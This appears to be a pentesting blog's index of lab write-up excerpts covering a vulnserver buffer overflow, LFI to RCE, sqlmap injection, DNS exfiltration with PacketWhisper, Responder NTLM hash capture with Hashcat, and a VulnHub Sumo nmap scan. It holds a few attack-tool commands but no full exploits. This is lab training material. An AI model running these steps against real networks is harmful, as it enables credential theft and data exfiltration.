bof steps (using tcm guide)

Below are the rough steps taken to perform a Buffer Overflow using TCM's guide from his Udemy course (although I think he has a guide on YouTube too, not sure if it's the exact same). The idea is to have key steps noted down here for future use if required.

• Run vulnserver and immunity debugger as admin, attach vulnserver and un-pause.
• On attacking machine connect to vulnserver e.g. nc -nv 192.168.1.100 9999 to review options.

Local File Inclusion to RCE

Below are rough notes on a recent HTB machine where a Local File Inclusion (LFI) led to a Remote Code Execution and access to the machine.

nmap returned a lot of open ports, running a directory browser using OWASP ZAP turned up multiple webapps.  One app kindly included it's version number on the page which made searching for known exploits very easy.

sql injection using sqlmap

Below are notes on a sql injection lab. First I identify that the page is susceptible to injection then run sqlmap to extract database content.

The page has a simple news page with the news item requested through an id=# parameter.  First I enter an invalid ID but with a true OR clause and the page returns content:

ex-filtrate data over dns with packetwhisper

I had a chance to use PacketWhisper in a lab exercise recently and wanted to try it out again in different environment for my own notes, below are the rough steps taken to setup and run the test.  First I cloned the repo on the target machine:

git clone https://github.com/TryCatchHCF/PacketWhisper.git

responder hash capture hashcat crack

Quick steps below for capturing a NTLM hash and trying to crack it using the tools Responder and Hashcat.  Below I forced a direct connection attempt to the pentest machine to get the hash.

sudo responder -I wlan0 -rdw

Once I try connecting to the pentest machine on \\192.168.50.165 I get the hash which I save to adminhash.txt

root vulnhub sumo

Rough steps to root on VulnHub Sumo

• A quick nmap scan shows some fairly dated versions:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:17:08:AB (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5